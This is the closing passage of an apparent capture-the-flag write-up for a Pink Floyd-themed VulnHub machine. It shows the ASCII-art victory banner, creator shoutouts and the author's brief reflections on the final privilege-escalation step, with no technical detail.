|_____|_______|_______|_ ,-'_ _____ | _______|_______|_______|_____|
| | | | ,-'| _ | | | | | |
|_|_______|_______|__ ,-|-' | ,-. \ /_.--. _____|_______|_______|_|
| | | | | | | V | ) | | | |
|_____|_______|_______|_ | _ |-'`-' | | ,' _|_______|_______|_____|
| | | | | | ' ;' | | | |
|_|_______|_______|______"|_____ _,- o'__|_______|_______|_______|_|
| | | | _,-' . | | | |
|_____|_______|_______|_ _,--'\ _,-'_____|_______|_______|_____|
| | | | ' ||_||-' _ | | | | |
|_|_______|_______|_______|__ || ||,-' __|_______|_______|_______|_|
| | | | | ||_,-' | | | |
|_____|_______|______.|_______.__ ___|_______|_______|_______|_____|
| | | | \ | / | | | | |
|_|_______|_______|___ \ __|___ /, _ | | ______|_______|_______|_|
| | | | \ // \ | | | | | |
|_____|_______|_______|_ \ /\ //--'\ | | __|_______|_______|_____|
| | | | ' V/ | |-' |__, | | | |
|_|_______|_______|_______|_______ _______'_______|_______|_______|_|
| | | | | | | | | |
|_____|_______|_______|_______|_______|_______|_______|_______|_____|
|_________|_______|_______|_______|_______|_______|_______|_______|_|
Celebrating 50 years of Pink Floyd!
Syd Barrett (RIP), Nick Mason, Roger Waters,
Richard Wright (RIP), and David Gilmour.
** Shoutouts **
+ @vulnhub for making it all possible
+ @rastamouse @thecolonial - "the test bunnies"
-=========================================-
- xerubus (@xerubus - www.mogozobo.com) -
-=========================================-
Conclusion
I really enjoyed this VM - not just because I'm a big fan of Pink Floyd, but also because of how it was laid out. The final step really did my head in. I spent days obsessing over how I could elevate my privileges, without read access to the final binary.
One lesson I'm taking away from this is: always double-check your evidence. You never know when the last piece of the puzzle is sitting there in plain sight.
Thanks for the challenge Xerubus, and thank you for hosting it VulnHub!